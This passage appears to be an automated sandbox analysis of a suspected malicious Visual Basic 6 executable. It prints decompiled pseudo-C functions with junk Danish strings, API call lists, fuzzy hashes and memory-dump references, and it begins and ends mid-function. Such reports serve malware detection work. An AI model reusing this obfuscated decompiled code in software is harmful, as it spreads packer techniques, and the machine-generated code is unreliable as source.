				return _t112;
			}

0x0041f2c9
0x0041f2d4
0x0041f2d5
0x0041f2e1
0x0041f2e9
0x0041f2ec
0x0041f2f9
0x0041f304
0x0041f311
0x0041f319
0x0041f31c
0x0041f326
0x0041f32a
0x0041f32b
0x0041f330
0x0041f337
0x0041f341
0x0041f342
0x0041f345
0x0041f346
0x0041f34b
0x0041f352
0x0041f35d
0x0041f36a
0x0041f387
0x0041f36c
0x0041f36c
0x0041f371
0x0041f376
0x0041f37b
0x0041f37b
0x0041f399
0x0041f3a8
0x0041f3ab
0x0041f3ad
0x0041f3b4
0x0041f3d0
0x0041f3b6
0x0041f3b6
0x0041f3b8
0x0041f3bd
0x0041f3c0
0x0041f3c3
0x0041f3c8
0x0041f3c8
0x0041f3da
0x0041f3e9
0x0041f3ef
0x0041f3f1
0x0041f3f8
0x0041f417
0x0041f3fa
0x0041f3fa
0x0041f3ff
0x0041f404
0x0041f407
0x0041f40a
0x0041f40f
0x0041f40f
0x0041f421
0x0041f427
0x0041f434
0x0041f43c
0x0041f448
0x0041f465
0x0041f44a
0x0041f44a
0x0041f44f
0x0041f454
0x0041f459
0x0041f459
0x0041f477
0x0041f486
0x0041f489
0x0041f48b
0x0041f492
0x0041f4ae
0x0041f494
0x0041f494
0x0041f496
0x0041f49b
0x0041f49e
0x0041f4a1
0x0041f4a6
0x0041f4a6
0x0041f4b8
0x0041f4bb
0x0041f4c2
0x0041f4c9
0x0041f4d0
0x0041f4d7
0x0041f4e1
0x0041f4eb
0x0041f4ec
0x0041f4ed
0x0041f4ee
0x0041f4f7
0x0041f4fb
0x0041f505
0x0041f513
0x0041f519
0x0041f51b
0x0041f522
0x0041f541
0x0041f524
0x0041f524
0x0041f529
0x0041f52e
0x0041f531
0x0041f534
0x0041f539
0x0041f539
0x0041f54b
0x0041f553
0x0041f55b
0x0041f55b
0x0041f560
0x0041f567
0x0041f56e
0x0041f571
0x0041f572
0x0041f57c
0x0041f584
0x0041f589
0x0041f590
0x0041f5bd
0x0041f5c5
0x0041f5cd
0x0041f5d5
0x0041f5dd
0x0041f5e2

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F2E1
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F2F9
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F304
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F311
#524.MSVBVM60(?,00004008), ref: 0041F32B
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F346
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F352
__vbaNew2.MSVBVM60(0040259C,004223C0,00008008,?,?,?,?,00004008), ref: 0041F376
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F3C3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F40A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F434
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F43C
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F454
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041F4A1
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F4E1
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F4FB
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F505
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F534
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F54B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F553
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F55B
#536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F572
__vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F57C
__vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F584
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5BD
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5C5
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5CD
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5D5
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5DD

Strings

ICHTHYOPOLISM, xrefs: 0041F330
Gurgledes, xrefs: 0041F309

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
String ID: Gurgledes$ICHTHYOPOLISM
API String ID: 2536202667-1995639141
Opcode ID: ed9cbcf699c8d69c2cf80d41fbead2f660abd6394d2512a5dd200d9f78887e4e
Instruction ID: b3c566b355482b57377b37e971ed18877d79850291c35d20e2b1ade5fc0181c7
Opcode Fuzzy Hash: ed9cbcf699c8d69c2cf80d41fbead2f660abd6394d2512a5dd200d9f78887e4e
Instruction Fuzzy Hash: FE91F771D00218EFDB10EFA5C985BDDBBB5BF09304F60816AE005B71A2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5FE, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041F5FE(void* __ebx, void* __edi, void* __esi, void* _a16, void* _a20, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v48;
				void* _v52;
				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v120;
				intOrPtr _v128;
				signed int* _v136;
				char _v144;
				signed int _v148;
				short _v152;
				signed int _v164;
				signed int* _t54;
				signed int _t56;
				short _t58;
				char* _t61;
				char* _t67;
				void* _t95;
				intOrPtr _t96;

				_t96 = _t95 - 0xc;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				L00401540();
				_v16 = _t96;
				_v12 = 0x401380;
				L004017B6();
				L004017B6();
				_t54 = _a24;
				 *_t54 =  *_t54 & 0x00000000;
				_push(L"Dukkestuer");
				L00401762();
				_v136 = _t54;
				_v144 = 0x8003;
				_v72 =  *0x401378;
				_v80 = 4;
				_push( &_v96);
				_t56 =  &_v80;
				_push(_t56);
				L004017A4();
				_v148 = _t56;
				if(_v148 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(_v148);
					L0040179E();
					_v164 = _t56;
				}
				_push( &_v144);
				_t58 =  &_v96;
				_push(_t58);
				L004016AE();
				_v152 = _t58;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t61 = _v152;
				if(_t61 != 0) {
					_push( &_v80);
					L00401654();
					L0040174A();
					_v88 = 5;
					_v96 = 2;
					_v120 = L"LAAGETS";
					_v128 = 8;
					L0040184C();
					_push( &_v96);
					_push(5);
					_push( &_v80);
					_push( &_v112);
					L0040168A();
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push( &_v112);
					_t67 =  &_v60;
					_push(_t67);
					L00401858();
					_push(_t67);
					_push(L"SNVRET");
					_push(L"OVERBEBYRDES");
					L004016D8();
					L0040183A();
					_push(_t67);
					L004017B0();
					L0040183A();
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L004017D4();
					_push( &_v112);
					_push( &_v96);
					_t61 =  &_v80;
					_push(_t61);
					_push(3);
					L00401840();
				}
				L004017B6();
				asm("wait");
				_push(0x41f806);
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t61;
			}

0x0041f601
0x0041f604
0x0041f60f
0x0041f610
0x0041f61c
0x0041f624
0x0041f627
0x0041f634
0x0041f63f
0x0041f644
0x0041f647
0x0041f64a
0x0041f64f
0x0041f654
0x0041f65a
0x0041f66a
0x0041f66d
0x0041f677
0x0041f678
0x0041f67b
0x0041f67c
0x0041f681
0x0041f68e
0x0041f6a3
0x0041f690
0x0041f690
0x0041f696
0x0041f69b
0x0041f69b
0x0041f6b0
0x0041f6b1
0x0041f6b4
0x0041f6b5
0x0041f6ba
0x0041f6c4
0x0041f6c8
0x0041f6c9
0x0041f6cb
0x0041f6d3
0x0041f6dc
0x0041f6e5
0x0041f6e6
0x0041f6f1
0x0041f6f6
0x0041f6fd
0x0041f704
0x0041f70b
0x0041f718
0x0041f720
0x0041f721
0x0041f726
0x0041f72a
0x0041f72b
0x0041f730
0x0041f732
0x0041f734
0x0041f739
0x0041f73a
0x0041f73d
0x0041f73e
0x0041f743
0x0041f744
0x0041f749
0x0041f74e
0x0041f758
0x0041f75d
0x0041f75e
0x0041f768
0x0041f770
0x0041f774
0x0041f775
0x0041f777
0x0041f782
0x0041f786
0x0041f787
0x0041f78a
0x0041f78b
0x0041f78d
0x0041f792
0x0041f79d
0x0041f7a2
0x0041f7a3
0x0041f7e8
0x0041f7f0
0x0041f7f8
0x0041f800
0x0041f805

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F61C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F634
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F63F
__vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F64F
#564.MSVBVM60(00000004,?), ref: 0041F67C
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F696
__vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F6B5
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F6CB
#546.MSVBVM60(?,?,?,00401546), ref: 0041F6E6
__vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F6F1
__vbaVarDup.MSVBVM60 ref: 0041F718
#629.MSVBVM60(?,?,00000005,00000002), ref: 0041F72B
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F73E
#712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F74E
__vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F758
#527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F75E
__vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F768
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F777
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F78D
__vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F79D
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7E8
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7F0
__vbaFreeVar.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7F8
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F800

Strings

Dukkestuer, xrefs: 0041F64A
LAAGETS, xrefs: 0041F704
SNVRET, xrefs: 0041F744
OVERBEBYRDES, xrefs: 0041F749
Antievangelical9, xrefs: 0041F795

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
API String ID: 3927249403-1920341584
Opcode ID: 4aa486b8403f2ab1d3a52087a52ee22202fdb5959a08ae937403575e1ae1e72b
Instruction ID: 91e37aafcf061903c238f2ee37cd7516ea807def931bc120dfbf4a8747ae6ff2
Opcode Fuzzy Hash: 4aa486b8403f2ab1d3a52087a52ee22202fdb5959a08ae937403575e1ae1e72b
Instruction Fuzzy Hash: 2D51EA72D00209ABDB10EBE1C846FDEB778AF04704F50817AB515B71E1EB785A4A8B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC89, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041EC89(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v92;
				intOrPtr _v100;
				signed int* _t37;
				char* _t40;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L00401540();
				_v16 = _t67;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401546, _t64);
				_t37 = _a16;
				 *_t37 =  *_t37 & 0x00000000;
				_push(0xb5);
				_push(L"SKADESLSHOLDELSERNE");
				_push(L"Fritgaaende");
				_push(0);
				L00401690();
				if(_t37 == 0xa2) {
					_v60 = 0xfe;
					_v68 = 2;
					_v92 = L"Flskekdet";
					_v100 = 8;
					L0040184C();
					_push( &_v68);
					_push(0x48);
					_push( &_v52);
					_push( &_v84);
					L0040168A();
					_push( &_v84);
					L00401834();
					L0040183A();
					_push( &_v84);
					_push( &_v68);
					_push( &_v52);
					_push(3);
					L00401840();
					_push(0x4f);
					_push(0x9e);
					_push(0x14);
					_push( &_v52);
					L00401684();
					_t37 =  &_v52;
					_push(_t37);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"GILENO");
				L004017EC();
				_push(_t37);
				_push( &_v52);
				L0040167E();
				_t40 =  &_v52;
				_push(_t40);
				L00401834();
				L0040183A();
				L00401828();
				_push(0x41edf3);
				L00401846();
				L00401846();
				return _t40;
			}

0x0041ec8c
0x0041ec9b
0x0041eca5
0x0041ecad
0x0041ecb0
0x0041ecb7
0x0041ecc6
0x0041ecc9
0x0041eccc
0x0041eccf
0x0041ecd4
0x0041ecd9
0x0041ecde
0x0041ece0
0x0041ecea
0x0041ecf0
0x0041ecf7
0x0041ecfe
0x0041ed05
0x0041ed12
0x0041ed1a
0x0041ed1b
0x0041ed20
0x0041ed24
0x0041ed25
0x0041ed2d
0x0041ed2e
0x0041ed38
0x0041ed40
0x0041ed44
0x0041ed48
0x0041ed49
0x0041ed4b
0x0041ed53
0x0041ed55
0x0041ed5a
0x0041ed5f
0x0041ed60
0x0041ed65
0x0041ed68
0x0041ed69
0x0041ed73
0x0041ed7b
0x0041ed7b
0x0041ed80
0x0041ed85
0x0041ed8d
0x0041ed91
0x0041ed92
0x0041ed97
0x0041ed9a
0x0041ed9b
0x0041eda5
0x0041edad
0x0041edb2
0x0041ede5
0x0041eded
0x0041edf2

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041ECA5
__vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ECE0
__vbaVarDup.MSVBVM60 ref: 0041ED12
#629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041ED25
__vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041ED2E
__vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041ED38
__vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041ED4B
#539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED60
__vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED69
__vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED73
__vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED7B
#696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED85
#698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED92
__vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED9B
__vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDA5
__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDAD
__vbaFreeStr.MSVBVM60(0041EDF3,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDE5
__vbaFreeStr.MSVBVM60(0041EDF3,00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDED

Strings

Flskekdet, xrefs: 0041ECFE
GILENO, xrefs: 0041ED80
Fritgaaende, xrefs: 0041ECD9
SKADESLSHOLDELSERNE, xrefs: 0041ECD4

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#539#629#696#698ChkstkList
String ID: Flskekdet$Fritgaaende$GILENO$SKADESLSHOLDELSERNE
API String ID: 1195518721-3815085929
Opcode ID: 21f479d4e8549f9512b131d84e4517ec8e55ee5aa513d9b356b125a0af386eab
Instruction ID: 3165435b05d5f84532501bab556701fdef39b2ce11282541f8c55afe617deff8
Opcode Fuzzy Hash: 21f479d4e8549f9512b131d84e4517ec8e55ee5aa513d9b356b125a0af386eab
Instruction Fuzzy Hash: 1B31C972940258ABDB00FBD1DD86FEE77B8BB04704F54442AB501BB1E1DB789A098B58

Uniqueness

Uniqueness Score: -1.00%

Function 00420C47, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00420C47(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				short _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				intOrPtr* _v256;
				signed int _v260;
				signed int _v264;
				char* _t91;
				short _t93;
				short _t100;
				signed int _t106;
				signed int _t110;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t125 = _t124 - 0x18;
				 *[fs:0x0] = _t125;
				L00401540();
				_v28 = _t125;
				_v24 = 0x401470;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t122);
				_v8 = 1;
				_v8 = 2;
				if(0 != 0) {
					_v8 = 3;
					L004017AA();
					_v52 = __fp0;
					_v8 = 4;
					if( *0x4223c0 != 0) {
						_v256 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v256 = 0x4223c0;
					}
					_v220 =  *_v256;
					_t106 =  *((intOrPtr*)( *_v220 + 0x4c))(_v220,  &_v56);
					asm("fclex");
					_v224 = _t106;
					if(_v224 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40258c);
						_push(_v220);
						_push(_v224);
						L004017C8();
						_v260 = _t106;
					}
					_v228 = _v56;
					_t110 =  *((intOrPtr*)( *_v228 + 0x28))(_v228);
					asm("fclex");
					_v232 = _t110;
					if(_v232 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x402ec8);
						_push(_v228);
						_push(_v232);
						L004017C8();
						_v264 = _t110;
					}
					L004017C2();
				}
				_v8 = 6;
				_v64 = 0x637f55;
				_v72 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v72);
				L0040161E();
				L0040183A();
				L00401828();
				_v8 = 7;
				_v64 = 0x1f1c50;
				_v72 = 3;
				_push( &_v72);
				_push( &_v88);
				L00401678();
				_v96 = 0xc1;
				_v104 = 2;
				_push( &_v104);
				_push(0xe7);
				_push( &_v88);
				_push( &_v120);
				L004015F4();
				_v128 = 0x1a6490;
				_v136 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t91 =  &_v136;
				_push(_t91);
				L004015EE();
				_v144 = _t91;
				_v152 = 0x8008;
				_push( &_v120);
				_t93 =  &_v152;
				_push(_t93);
				L00401660();
				_v220 = _t93;
				_push( &_v152);
				_push( &_v120);
				_push( &_v136);
				_push( &_v104);
				_push( &_v88);
				_push( &_v72);
				_push(6);
				L00401840();
				_t100 = _v220;
				if(_t100 != 0) {
					_v8 = 8;
					_push(0xffffffff);
					L004016E4();
					_v8 = 9;
					_push(L"Cryptodeist");
					L004017B0();
					L0040183A();
				}
				_v8 = 0xb;
				_v40 = 0x85ca67;
				asm("wait");
				_push(0x420f26);
				L00401846();
				L00401846();
				return _t100;
			}

0x00420c4a
0x00420c59
0x00420c65
0x00420c6d
0x00420c70
0x00420c77
0x00420c7e
0x00420c8d
0x00420c90
0x00420c97
0x00420ca2
0x00420ca8
0x00420caf
0x00420cb4
0x00420cb7
0x00420cc5
0x00420ce2
0x00420cc7
0x00420cc7
0x00420ccc
0x00420cd1
0x00420cd6
0x00420cd6
0x00420cf4
0x00420d0c
0x00420d0f
0x00420d11
0x00420d1e
0x00420d40
0x00420d20
0x00420d20
0x00420d22
0x00420d27
0x00420d2d
0x00420d33
0x00420d38
0x00420d38
0x00420d4a
0x00420d5e
0x00420d61
0x00420d63
0x00420d70
0x00420d92
0x00420d72
0x00420d72
0x00420d74
0x00420d79
0x00420d7f
0x00420d85
0x00420d8a
0x00420d8a
0x00420d9c
0x00420d9c
0x00420da1
0x00420da8
0x00420daf
0x00420db6
0x00420db8
0x00420dba
0x00420dbc
0x00420dc1
0x00420dc2
0x00420dcc
0x00420dd4
0x00420dd9
0x00420de0
0x00420de7
0x00420df1
0x00420df5
0x00420df6
0x00420dfb
0x00420e02
0x00420e0c
0x00420e0d
0x00420e15
0x00420e19
0x00420e1a
0x00420e1f
0x00420e26
0x00420e30
0x00420e32
0x00420e34
0x00420e36
0x00420e38
0x00420e3e
0x00420e3f
0x00420e44
0x00420e4a
0x00420e57
0x00420e58
0x00420e5e
0x00420e5f
0x00420e64
0x00420e71
0x00420e75
0x00420e7c
0x00420e80
0x00420e84
0x00420e88
0x00420e89
0x00420e8b
0x00420e93
0x00420e9c
0x00420e9e
0x00420ea5
0x00420ea7
0x00420eac
0x00420eb3
0x00420eb8
0x00420ec2
0x00420ec2
0x00420ec7
0x00420ece
0x00420ed5
0x00420ed6
0x00420f18
0x00420f20
0x00420f25

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420C65
#535.MSVBVM60(?,?,?,?,00401546), ref: 00420CAF
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00401546), ref: 00420CD1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000004C), ref: 00420D33
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420D85
__vbaFreeObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 00420D9C
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DC2
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DCC
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DD4
#613.MSVBVM60(?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420DF6
#632.MSVBVM60(?,?,000000E7,?,?,00000003,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420E1A
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?,?,00000003), ref: 00420E3F
__vbaVarTstEq.MSVBVM60(00008008,?,00000003,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,000000E7,?), ref: 00420E5F
__vbaFreeVarList.MSVBVM60(00000006,00000003,?,?,00000003,?,00008008,00008008,?,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420E8B
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420EA7
#527.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420EB8
__vbaStrMove.MSVBVM60(Cryptodeist,000000FF,?,?,?,?,?,?,00401546), ref: 00420EC2
__vbaFreeStr.MSVBVM60(00420F26), ref: 00420F18
__vbaFreeStr.MSVBVM60(00420F26), ref: 00420F20

Strings

Cryptodeist, xrefs: 00420EB3

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#527#535#613#632#702#704ChkstkErrorListNew2
String ID: Cryptodeist
API String ID: 3497234973-3010629389
Opcode ID: e6ce50758a15ca2145e017513cc8d7a3dd008a7be3c4547de8487f39b0c79984
Instruction ID: a3d4a76e2b47af061966e80575315aca466b86c3be63d67db3ffe8e40ce73383
Opcode Fuzzy Hash: e6ce50758a15ca2145e017513cc8d7a3dd008a7be3c4547de8487f39b0c79984
Instruction Fuzzy Hash: A57139B1901228EBDB10DF91CE45BDDB7B8AF04314F6086AAE119B71E1DB785B48CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004205F9, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004205F9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v68;
				signed int _t39;
				signed int _t43;
				signed int _t49;
				intOrPtr _t66;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_t39 = 0x30;
				L00401540();
				_v12 = _t66;
				_v8 = 0x4013e0;
				L00401612();
				L0040183A();
				_push(_t39);
				_push(L"Skimmia");
				L0040172C();
				asm("sbb eax, eax");
				_v40 =  ~( ~_t39 + 1);
				L00401846();
				_t43 = _v40;
				if(_t43 != 0) {
					_push(0x47);
					L00401786();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v60 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v60 = 0x4223c0;
					}
					_v40 =  *_v60;
					_t49 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
					asm("fclex");
					_v44 = _t49;
					if(_v44 >= 0) {
						_v64 = _v64 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v40);
						_push(_v44);
						L004017C8();
						_v64 = _t49;
					}
					_v48 = _v36;
